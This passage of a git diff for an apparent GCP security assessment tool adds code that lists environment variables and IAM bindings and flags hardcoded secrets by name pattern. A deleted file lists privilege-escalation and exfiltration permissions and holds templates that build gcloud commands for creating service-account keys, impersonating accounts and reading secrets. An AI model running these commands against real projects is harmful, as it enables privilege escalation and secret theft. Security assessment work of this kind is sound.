used by the service +type SecretRefInfo struct { + EnvVarName string // The env var name that references this secret + SecretName string // Secret Manager secret name + SecretVersion string // Version (e.g., "latest", "1") + MountPath string // For volume mounts, the path where it's mounted + Type string // "env" or "volume" +} + // JobInfo holds Cloud Run job details type JobInfo struct { Name string @@ -78,6 +111,14 @@ type JobInfo struct { EnvVarCount int SecretEnvVarCount int SecretVolumeCount int + + // Security analysis + HardcodedSecrets []HardcodedSecret + UsesDefaultSA bool + + // Detailed env var and secret info + EnvVars []EnvVarInfo + SecretRefs []SecretRefInfo } // Services retrieves all Cloud Run services in a project across all regions @@ -229,14 +270,36 @@ func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) Servic } } - // Environment variables (count only) + // Environment variables info.EnvVarCount = len(container.Env) - // Count secret environment variables + // Process each environment variable for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value } + + info.EnvVars = append(info.EnvVars, envInfo) } // Count secret volumes @@ -245,11 +308,23 @@ func parseServiceInfo(svc *run.GoogleCloudRunV2Service, projectID string) Servic for _, svcVol := range svc.Template.Volumes { if svcVol.Name == vol.Name && svcVol.Secret != nil { info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: svcVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) break } } } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) } return info @@ -290,14 +365,36 @@ func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { container := job.Template.Template.Containers[0] info.ContainerImage = container.Image - // Environment variables (count only) + // Environment variables info.EnvVarCount = len(container.Env) - // Count secret environment variables + // Process each environment variable for _, env := range container.Env { + envInfo := EnvVarInfo{ + Name: env.Name, + } + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + // Secret Manager reference info.SecretEnvVarCount++ + envInfo.Source = "secret-manager" + envInfo.SecretName = env.ValueSource.SecretKeyRef.Secret + envInfo.SecretVersion = env.ValueSource.SecretKeyRef.Version + + // Also add to SecretRefs + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + EnvVarName: env.Name, + SecretName: env.ValueSource.SecretKeyRef.Secret, + SecretVersion: env.ValueSource.SecretKeyRef.Version, + Type: "env", + }) + } else { + // Direct value + envInfo.Source = "direct" + envInfo.Value = env.Value } + + info.EnvVars = append(info.EnvVars, envInfo) } // Count secret volumes @@ -305,11 +402,23 @@ func parseJobInfo(job *run.GoogleCloudRunV2Job, projectID string) JobInfo { for _, jobVol := range job.Template.Template.Volumes { if jobVol.Name == vol.Name && jobVol.Secret != nil { info.SecretVolumeCount++ + info.SecretRefs = append(info.SecretRefs, SecretRefInfo{ + SecretName: jobVol.Secret.Secret, + SecretVersion: "latest", + MountPath: vol.MountPath, + Type: "volume", + }) break } } } + + // Detect hardcoded secrets in env vars + info.HardcodedSecrets = detectHardcodedSecrets(container.Env) } + + // Check for default service account + info.UsesDefaultSA = isDefaultServiceAccount(info.ServiceAccount, projectID) } } @@ -358,3 +467,83 @@ func extractName(fullName string) string { } return fullName } + +// secretPatterns maps env var name patterns to secret types +var secretPatterns = map[string]string{ + "PASSWORD": "password", + "PASSWD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "APIKEY": "api-key", + "API-KEY": "api-key", + "TOKEN": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER": "token", + "CREDENTIAL": "credential", + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "CONNECTION_STRING": "connection-string", + "CONN_STR": "connection-string", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "DB_PASS": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "REDIS_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_ACCESS_KEY": "credential", + "AWS_SECRET": "credential", + "AZURE_KEY": "credential", + "GCP_KEY": "credential", + "ENCRYPTION_KEY": "credential", + "SIGNING_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + "OAUTH": "credential", + "CLIENT_SECRET": "credential", +} + +// detectHardcodedSecrets analyzes env vars to find potential hardcoded secrets +func detectHardcodedSecrets(envVars []*run.GoogleCloudRunV2EnvVar) []HardcodedSecret { + var secrets []HardcodedSecret + + for _, env := range envVars { + if env == nil { + continue + } + + // Skip if using Secret Manager reference + if env.ValueSource != nil && env.ValueSource.SecretKeyRef != nil { + continue + } + + // Only flag if there's a direct value (not empty) + if env.Value == "" { + continue + } + + envNameUpper := strings.ToUpper(env.Name) + + for pattern, secretType := range secretPatterns { + if strings.Contains(envNameUpper, pattern) { + secrets = append(secrets, HardcodedSecret{ + EnvVarName: env.Name, + SecretType: secretType, + }) + break + } + } + } + + return secrets +} + +// isDefaultServiceAccount checks if the service account is a default compute SA +func isDefaultServiceAccount(sa, projectID string) bool { + if sa == "" { + return true // Empty means using default + } + // Default compute SA pattern: {project-number}-compute@developer.gserviceaccount.com + return strings.Contains(sa, "-compute@developer.gserviceaccount.com") +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go index 8234f485..c9ad22f3 100644 --- a/gcp/services/composerService/composerService.go +++ b/gcp/services/composerService/composerService.go @@ -46,13 +46,9 @@ type EnvironmentInfo struct { ServiceAccount string `json:"serviceAccount"` // Security config - PrivateEnvironment bool `json:"privateEnvironment"` - WebServerAllowedIPs []string `json:"webServerAllowedIps"` - EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + PrivateEnvironment bool `json:"privateEnvironment"` + WebServerAllowedIPs []string `json:"webServerAllowedIps"` + EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` } // ListEnvironments retrieves all Composer environments in a project @@ -92,13 +88,12 @@ func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, // parseEnvironment converts a Composer environment to EnvironmentInfo func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID string) EnvironmentInfo { info := EnvironmentInfo{ - Name: extractName(env.Name), - ProjectID: projectID, - Location: extractLocation(env.Name), - State: env.State, - CreateTime: env.CreateTime, - UpdateTime: env.UpdateTime, - RiskReasons: []string{}, + Name: extractName(env.Name), + ProjectID: projectID, + Location: extractLocation(env.Name), + State: env.State, + CreateTime: env.CreateTime, + UpdateTime: env.UpdateTime, } if env.Config != nil { @@ -143,59 +138,9 @@ func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID } } - // Security analysis - info.RiskLevel, info.RiskReasons = s.analyzeEnvironmentRisk(info) - return info } -// analyzeEnvironmentRisk determines the risk level of a Composer environment -func (s *ComposerService) analyzeEnvironmentRisk(env EnvironmentInfo) (string, []string) { - var reasons []string - score := 0 - - // Public Airflow UI - if !env.PrivateEnvironment { - reasons = append(reasons, "Not using private environment") - score += 2 - } - - // Public endpoint - if !env.EnablePrivateEndpoint && env.AirflowURI != "" { - reasons = append(reasons, "Airflow web server has public endpoint") - score += 2 - } - - // No IP restrictions or 0.0.0.0/0 - if len(env.WebServerAllowedIPs) == 0 { - reasons = append(reasons, "No web server IP restrictions") - score += 1 - } else { - for _, ip := range env.WebServerAllowedIPs { - if ip == "0.0.0.0/0" { - reasons = append(reasons, "Web server allows all IPs (0.0.0.0/0)") - score += 2 - break - } - } - } - - // Default service account - if env.ServiceAccount == "" || strings.Contains(env.ServiceAccount, "compute@developer.gserviceaccount.com") { - reasons = append(reasons, "Uses default Compute Engine service account") - score += 2 - } - - if score >= 4 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullName string) string { parts := strings.Split(fullName, "/") if len(parts) > 0 { diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index 2a1416ce..efa3fada 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -29,6 +29,12 @@ type ServiceAccountInfo struct { Scopes []string `json:"scopes"` } +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + // ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { // Basic info @@ -83,6 +89,9 @@ type ComputeEngineInfo struct { // Timestamps CreationTimestamp string `json:"creationTimestamp"` LastStartTimestamp string `json:"lastStartTimestamp"` + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` } // ProjectMetadataInfo contains project-level metadata security info @@ -117,6 +126,31 @@ func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Servi return compute.NewService(ctx) } +// getInstanceIAMBindings retrieves all IAM bindings for an instance +func (ces *ComputeEngineService) getInstanceIAMBindings(service *compute.Service, projectID, zone, instanceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.Instances.GetIamPolicy(projectID, zone, instanceName).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + // Retrieves instances from all regions and zones for a project without using concurrency. func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { ctx := context.Background() @@ -193,6 +227,9 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf // Parse boot disk encryption info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + // Fetch IAM bindings for this instance + info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) + instanceInfos = append(instanceInfos, info) } } diff --git a/gcp/services/customRolesService/customRolesService.go b/gcp/services/customRolesService/customRolesService.go deleted file mode 100644 index 566c86e9..00000000 --- a/gcp/services/customRolesService/customRolesService.go +++ /dev/null @@ -1,285 +0,0 @@ -package customrolesservice - -import ( - "context" - "fmt" - "strings" - - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - iam "google.golang.org/api/iam/v1" -) - -type CustomRolesService struct{} - -func New() *CustomRolesService { - return &CustomRolesService{} -} - -// CustomRoleInfo represents a custom IAM role -type CustomRoleInfo struct { - Name string `json:"name"` - Title string `json:"title"` - Description string `json:"description"` - ProjectID string `json:"projectId"` - Stage string `json:"stage"` // ALPHA, BETA, GA, DEPRECATED - Deleted bool `json:"deleted"` - IncludedPermissions []string `json:"includedPermissions"` - PermissionCount int `json:"permissionCount"` - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - DangerousPerms []string `json:"dangerousPermissions"` - PrivescPerms []string `json:"privescPermissions"` -} - -// RolePermissionAnalysis contains detailed analysis of role permissions -type RolePermissionAnalysis struct { - RoleName string `json:"roleName"` - ProjectID string `json:"projectId"` - TotalPermissions int `json:"totalPermissions"` - DangerousCount int `json:"dangerousCount"` - PrivescCount int `json:"privescCount"` - PermissionsByType map[string]int `json:"permissionsByType"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - ExploitCommands []string `json:"exploitCommands"` -} - -// DangerousPermission defines a dangerous permission with its risk category -type DangerousPermission struct { - Permission string - Category string // privesc, data_exfil, persistence, lateral_movement - Description string - RiskLevel string // CRITICAL, HIGH, MEDIUM -} - -// GetDangerousPermissions returns the list of dangerous permissions -func (s *CustomRolesService) GetDangerousPermissions() []DangerousPermission { - return []DangerousPermission{ - // Privilege Escalation - CRITICAL - {Permission: "iam.serviceAccountKeys.create", Category: "privesc", Description: "Create SA keys for persistent access", RiskLevel: "CRITICAL"}, - {Permission: "iam.serviceAccountTokenCreator", Category: "privesc", Description: "Generate access tokens for any SA", RiskLevel: "CRITICAL"}, - {Permission: "iam.serviceAccounts.getAccessToken", Category: "privesc", Description: "Get access token for SA", RiskLevel: "CRITICAL"}, - {Permission: "iam.serviceAccounts.signBlob", Category: "privesc", Description: "Sign blobs as SA", RiskLevel: "CRITICAL"}, - {Permission: "iam.serviceAccounts.signJwt", Category: "privesc", Description: "Sign JWTs as SA", RiskLevel: "CRITICAL"}, - {Permission: "iam.serviceAccounts.implicitDelegation", Category: "privesc", Description: "Implicit delegation for SA", RiskLevel: "CRITICAL"}, - {Permission: "iam.serviceAccounts.actAs", Category: "privesc", Description: "Act as service account", RiskLevel: "CRITICAL"}, - {Permission: "resourcemanager.projects.setIamPolicy", Category: "privesc", Description: "Modify project IAM", RiskLevel: "CRITICAL"}, - {Permission: "iam.roles.create", Category: "privesc", Description: "Create custom roles", RiskLevel: "HIGH"}, - {Permission: "iam.roles.update", Category: "privesc", Description: "Modify custom roles", RiskLevel: "HIGH"}, - {Permission: "deploymentmanager.deployments.create", Category: "privesc", Description: "Deploy resources with elevated perms", RiskLevel: "HIGH"}, - {Permission: "cloudfunctions.functions.setIamPolicy", Category: "privesc", Description: "Modify function IAM", RiskLevel: "HIGH"}, - {Permission: "run.services.setIamPolicy", Category: "privesc", Description: "Modify Cloud Run IAM", RiskLevel: "HIGH"}, - - // Data Exfiltration - HIGH - {Permission: "storage.objects.get", Category: "data_exfil", Description: "Read storage objects", RiskLevel: "MEDIUM"}, - {Permission: "storage.objects.list", Category: "data_exfil", Description: "List storage objects", RiskLevel: "LOW"}, - {Permission: "bigquery.tables.getData", Category: "data_exfil", Description: "Read BigQuery data", RiskLevel: "HIGH"}, - {Permission: "secretmanager.versions.access", Category: "data_exfil", Description: "Access secret values", RiskLevel: "CRITICAL"}, - {Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", Category: "data_exfil", Description: "Decrypt with KMS keys", RiskLevel: "HIGH"}, - - // Persistence - HIGH - {Permission: "compute.instances.setMetadata", Category: "persistence", Description: "Modify instance metadata/SSH keys", RiskLevel: "HIGH"}, - {Permission: "compute.projects.setCommonInstanceMetadata", Category: "persistence", Description: "Modify project-wide metadata", RiskLevel: "HIGH"}, - {Permission: "cloudfunctions.functions.create", Category: "persistence", Description: "Create cloud functions", RiskLevel: "MEDIUM"}, - {Permission: "cloudfunctions.functions.update", Category: "persistence", Description: "Update cloud functions", RiskLevel: "MEDIUM"}, - {Permission: "run.services.create", Category: "persistence", Description: "Create Cloud Run services", RiskLevel: "MEDIUM"}, - {Permission: "compute.instances.create", Category: "persistence", Description: "Create compute instances", RiskLevel: "MEDIUM"}, - - // Lateral Movement - HIGH - {Permission: "compute.instances.setServiceAccount", Category: "lateral_movement", Description: "Change instance SA", RiskLevel: "HIGH"}, - {Permission: "container.clusters.getCredentials", Category: "lateral_movement", Description: "Get GKE cluster credentials", RiskLevel: "HIGH"}, - {Permission: "cloudsql.instances.connect", Category: "lateral_movement", Description: "Connect to Cloud SQL", RiskLevel: "MEDIUM"}, - - // Organization/Folder level - CRITICAL - {Permission: "resourcemanager.organizations.setIamPolicy", Category: "privesc", Description: "Modify org-level IAM", RiskLevel: "CRITICAL"}, - {Permission: "resourcemanager.folders.setIamPolicy", Category: "privesc", Description: "Modify folder IAM", RiskLevel: "CRITICAL"}, - - // Logging/Audit - HIGH (covering tracks) - {Permission: "logging.sinks.delete", Category: "persistence", Description: "Delete log sinks", RiskLevel: "HIGH"}, - {Permission: "logging.logs.delete", Category: "persistence", Description: "Delete logs", RiskLevel: "HIGH"}, - } -} - -// ListCustomRoles lists all custom roles in a project -func (s *CustomRolesService) ListCustomRoles(projectID string) ([]CustomRoleInfo, error) { - ctx := context.Background() - - iamService, err := iam.NewService(ctx) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") - } - - var roles []CustomRoleInfo - parent := fmt.Sprintf("projects/%s", projectID) - - req := iamService.Projects.Roles.List(parent).ShowDeleted(false) - err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { - for _, role := range page.Roles { - // Get full role details including permissions - roleDetail, err := iamService.Projects.Roles.Get(role.Name).Do() - if err != nil { - continue - } - - info := CustomRoleInfo{ - Name: extractRoleID(role.Name), - Title: role.Title, - Description: role.Description, - ProjectID: projectID, - Stage: role.Stage, - Deleted: role.Deleted, - IncludedPermissions: roleDetail.IncludedPermissions, - PermissionCount: len(roleDetail.IncludedPermissions), - RiskReasons: []string{}, - } - - // Analyze the role - info.RiskLevel, info.RiskReasons, info.DangerousPerms, info.PrivescPerms = s.analyzeRole(info) - - roles = append(roles, info) - } - return nil - }) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") - } - - return roles, nil -} - -// AnalyzeRoleInDepth performs detailed security analysis on a role -func (s *CustomRolesService) AnalyzeRoleInDepth(role CustomRoleInfo) RolePermissionAnalysis { - analysis := RolePermissionAnalysis{ - RoleName: role.Name, - ProjectID: role.ProjectID, - TotalPermissions: role.PermissionCount, - PermissionsByType: make(map[string]int), - RiskReasons: []string{}, - ExploitCommands: []string{}, - } - - dangerousPerms := s.GetDangerousPermissions() - dangerousMap := make(map[string]DangerousPermission) - for _, dp := range dangerousPerms { - dangerousMap[dp.Permission] = dp - } - - // Categorize permissions - for _, perm := range role.IncludedPermissions { - // Extract service from permission (e.g., "storage" from "storage.objects.get") - parts := strings.Split(perm, ".") - if len(parts) > 0 { - service := parts[0] - analysis.PermissionsByType[service]++ - } - - // Check if dangerous - if dp, found := dangerousMap[perm]; found { - if dp.Category == "privesc" { - analysis.PrivescCount++ - } - analysis.DangerousCount++ - analysis.RiskReasons = append(analysis.RiskReasons, - fmt.Sprintf("[%s] %s: %s", dp.RiskLevel, perm, dp.Description)) - } - } - - // Generate exploitation commands based on permissions - for _, perm := range role.IncludedPermissions { - switch { - case strings.Contains(perm, "serviceAccountKeys.create"): - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Create SA key (role has %s):\ngcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", - perm, role.ProjectID)) - case strings.Contains(perm, "serviceAccounts.getAccessToken"): - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Get access token (role has %s):\ngcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", - perm, role.ProjectID)) - case strings.Contains(perm, "secretmanager.versions.access"): - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Access secrets (role has %s):\ngcloud secrets versions access latest --secret=SECRET_NAME --project=%s", - perm, role.ProjectID)) - case strings.Contains(perm, "setIamPolicy"): - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Modify IAM policy (role has %s):\n# This allows privilege escalation by granting yourself additional roles", - perm)) - } - } - - // Determine risk level - if analysis.PrivescCount >= 2 { - analysis.RiskLevel = "CRITICAL" - } else if analysis.PrivescCount == 1 || analysis.DangerousCount >= 3 { - analysis.RiskLevel = "HIGH" - } else if analysis.DangerousCount >= 1 { - analysis.RiskLevel = "MEDIUM" - } else { - analysis.RiskLevel = "LOW" - } - - return analysis -} - -// analyzeRole performs security analysis on a custom role -func (s *CustomRolesService) analyzeRole(role CustomRoleInfo) (riskLevel string, reasons []string, dangerousPerms []string, privescPerms []string) { - dangerousPermList := s.GetDangerousPermissions() - dangerousMap := make(map[string]DangerousPermission) - for _, dp := range dangerousPermList { - dangerousMap[dp.Permission] = dp - } - - score := 0 - - for _, perm := range role.IncludedPermissions { - if dp, found := dangerousMap[perm]; found { - dangerousPerms = append(dangerousPerms, perm) - if dp.Category == "privesc" { - privescPerms = append(privescPerms, perm) - score += 3 - reasons = append(reasons, fmt.Sprintf("Privesc permission: %s", perm)) - } else if dp.RiskLevel == "CRITICAL" { - score += 2 - reasons = append(reasons, fmt.Sprintf("Critical permission: %s", perm)) - } else if dp.RiskLevel == "HIGH" { - score += 1 - reasons = append(reasons, fmt.Sprintf("High-risk permission: %s", perm)) - } - } - - // Check for wildcard permissions - if strings.HasSuffix(perm, ".*") || strings.Contains(perm, "All") { - reasons = append(reasons, fmt.Sprintf("Broad permission: %s", perm)) - score += 1 - } - } - - // Large number of permissions is a risk indicator - if role.PermissionCount > 50 { - reasons = append(reasons, fmt.Sprintf("Large role with %d permissions", role.PermissionCount)) - score += 1 - } - - if score >= 6 { - riskLevel = "CRITICAL" - } else if score >= 3 { - riskLevel = "HIGH" - } else if score >= 1 { - riskLevel = "MEDIUM" - } else { - riskLevel = "LOW" - } - - return -} - -// extractRoleID extracts the role ID from the full name -func extractRoleID(name string) string { - // Format: projects/PROJECT_ID/roles/ROLE_ID - parts := strings.Split(name, "/") - if len(parts) > 0 { - return parts[len(parts)-1] - } - return name -} diff --git a/gcp/services/dataprocService/dataprocService.go b/gcp/services/dataprocService/dataprocService.go index 4c2006bc..13005b0a 100644 --- a/gcp/services/dataprocService/dataprocService.go +++ b/gcp/services/dataprocService/dataprocService.go @@ -37,9 +37,10 @@ type ClusterInfo struct { ServiceAccount string `json:"serviceAccount"` // Master config - MasterMachineType string `json:"masterMachineType"` - MasterCount int64 `json:"masterCount"` - MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + MasterMachineType string `json:"masterMachineType"` + MasterCount int64 `json:"masterCount"` + MasterDiskSizeGB int64 `json:"masterDiskSizeGb"` + MasterInstanceNames []string `json:"masterInstanceNames"` // Worker config WorkerMachineType string `json:"workerMachineType"` @@ -56,9 +57,14 @@ type ClusterInfo struct { KerberosEnabled bool `json:"kerberosEnabled"` SecureBoot bool `json:"secureBoot"` - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` } // JobInfo represents a Dataproc job @@ -108,7 +114,7 @@ func (s *DataprocService) ListClusters(projectID string) ([]ClusterInfo, error) } for _, cluster := range regionClusters.Clusters { - info := s.parseCluster(cluster, projectID, region) + info := s.parseCluster(cluster, projectID, region, service, ctx) clusters = append(clusters, info) } } @@ -146,13 +152,13 @@ func (s *DataprocService) ListJobs(projectID, region string) ([]JobInfo, error) return jobs, nil } -func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string) ClusterInfo { +func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, region string, service *dataproc.Service, ctx context.Context) ClusterInfo { info := ClusterInfo{ Name: cluster.ClusterName, ProjectID: projectID, Region: region, ClusterUUID: cluster.ClusterUuid, - RiskReasons: []string{}, + IAMBindings: []IAMBinding{}, } if cluster.Status != nil { @@ -188,6 +194,7 @@ func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, reg mc := cluster.Config.MasterConfig info.MasterMachineType = extractName(mc.MachineTypeUri) info.MasterCount = mc.NumInstances + info.MasterInstanceNames = mc.InstanceNames if mc.DiskConfig != nil { info.MasterDiskSizeGB = mc.DiskConfig.BootDiskSizeGb } @@ -209,7 +216,8 @@ func (s *DataprocService) parseCluster(cluster *dataproc.Cluster, projectID, reg } } - info.RiskLevel, info.RiskReasons = s.analyzeClusterRisk(info) + // Get IAM policy for the cluster + info.IAMBindings = s.getClusterIAMBindings(service, ctx, projectID, region, cluster.ClusterName) return info } @@ -260,48 +268,27 @@ func (s *DataprocService) parseJob(job *dataproc.Job, projectID, region string) return info } -func (s *DataprocService) analyzeClusterRisk(cluster ClusterInfo) (string, []string) { - var reasons []string - score := 0 - - // Public IPs - if !cluster.InternalIPOnly { - reasons = append(reasons, "Cluster nodes have public IP addresses") - score += 2 - } - - // Default service account - if cluster.ServiceAccount == "" || strings.Contains(cluster.ServiceAccount, "compute@developer.gserviceaccount.com") { - reasons = append(reasons, "Uses default Compute Engine service account") - score += 2 - } +// getClusterIAMBindings retrieves IAM bindings for a Dataproc cluster +func (s *DataprocService) getClusterIAMBindings(service *dataproc.Service, ctx context.Context, projectID, region, clusterName string) []IAMBinding { + var bindings []IAMBinding - // No Kerberos - if !cluster.KerberosEnabled { - reasons = append(reasons, "Kerberos authentication not enabled") - score += 1 - } - - // No secure boot - if !cluster.SecureBoot { - reasons = append(reasons, "Secure Boot not enabled") - score += 1 + resource := fmt.Sprintf("projects/%s/regions/%s/clusters/%s", projectID, region, clusterName) + policy, err := service.Projects.Regions.Clusters.GetIamPolicy(resource, &dataproc.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings } - // Old image version (simplified check) - if cluster.ImageVersion != "" && strings.HasPrefix(cluster.ImageVersion, "1.") { - reasons = append(reasons, fmt.Sprintf("Using older image version: %s", cluster.ImageVersion)) - score += 1 + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } } - if score >= 4 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons + return bindings } func extractName(fullPath string) string { diff --git a/gcp/services/dnsService/dnsService.go b/gcp/services/dnsService/dnsService.go index a1226caf..ae898fe2 100644 --- a/gcp/services/dnsService/dnsService.go +++ b/gcp/services/dnsService/dnsService.go @@ -39,6 +39,15 @@ type ZoneInfo struct { // Record count RecordCount int64 + + // IAM bindings + IAMBindings []IAMBinding +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string } // RecordInfo holds DNS record details @@ -66,6 +75,8 @@ func (ds *DNSService) Zones(projectID string) ([]ZoneInfo, error) { err = call.Pages(ctx, func(page *dns.ManagedZonesListResponse) error { for _, zone := range page.ManagedZones { info := parseZoneInfo(zone, projectID) + // Get IAM bindings for the zone + info.IAMBindings = ds.getZoneIAMBindings(service, ctx, projectID, zone.Name) zones = append(zones, info) } return nil @@ -172,3 +183,26 @@ func extractNetworkName(networkURL string) string { } return networkURL } + +// getZoneIAMBindings retrieves IAM bindings for a DNS managed zone +func (ds *DNSService) getZoneIAMBindings(service *dns.Service, ctx context.Context, projectID, zoneName string) []IAMBinding { + var bindings []IAMBinding + + resource := "projects/" + projectID + "/managedZones/" + zoneName + policy, err := service.ManagedZones.GetIamPolicy(resource, &dns.GoogleIamV1GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + // Return empty bindings if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} diff --git a/gcp/services/domainWideDelegationService/domainWideDelegationService.go b/gcp/services/domainWideDelegationService/domainWideDelegationService.go index 09a7aae0..7d7b8662 100644 --- a/gcp/services/domainWideDelegationService/domainWideDelegationService.go +++ b/gcp/services/domainWideDelegationService/domainWideDelegationService.go @@ -17,19 +17,27 @@ func New() *DomainWideDelegationService { // DWDServiceAccount represents a service account with domain-wide delegation type DWDServiceAccount struct { - Email string `json:"email"` - ProjectID string `json:"projectId"` - UniqueID string `json:"uniqueId"` - DisplayName string `json:"displayName"` - OAuth2ClientID string `json:"oauth2ClientId"` - DWDEnabled bool `json:"dwdEnabled"` - HasKeys bool `json:"hasKeys"` - KeyCount int `json:"keyCount"` - Description string `json:"description"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - ExploitCommands []string `json:"exploitCommands"` - WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try + Email string `json:"email"` + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + OAuth2ClientID string `json:"oauth2ClientId"` + DWDEnabled bool `json:"dwdEnabled"` + Keys []KeyInfo `json:"keys"` + Description string `json:"description"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` + ExploitCommands []string `json:"exploitCommands"` + WorkspaceScopes []string `json:"workspaceScopes"` // Common Workspace scopes to try +} + +// KeyInfo represents a service account key +type KeyInfo struct { + KeyID string `json:"keyId"` + CreatedAt string `json:"createdAt"` + ExpiresAt string `json:"expiresAt"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyType string `json:"keyType"` } // Common Google Workspace OAuth scopes that DWD service accounts might have @@ -71,14 +79,15 @@ func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([ dwdEnabled := sa.Oauth2ClientId != "" account := DWDServiceAccount{ - Email: sa.Email, - ProjectID: projectID, - UniqueID: sa.UniqueId, - DisplayName: sa.DisplayName, - OAuth2ClientID: sa.Oauth2ClientId, - DWDEnabled: dwdEnabled, - Description: sa.Description, - RiskReasons: []string{}, + Email: sa.Email, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + OAuth2ClientID: sa.Oauth2ClientId, + DWDEnabled: dwdEnabled, + Description: sa.Description, + Keys: []KeyInfo{}, + RiskReasons: []string{}, ExploitCommands: []string{}, WorkspaceScopes: CommonWorkspaceScopes, } @@ -88,15 +97,23 @@ func (s *DomainWideDelegationService) GetDWDServiceAccounts(projectID string) ([ fmt.Sprintf("projects/%s/serviceAccounts/%s", projectID, sa.Email), ).Context(ctx).Do() if err == nil { - // 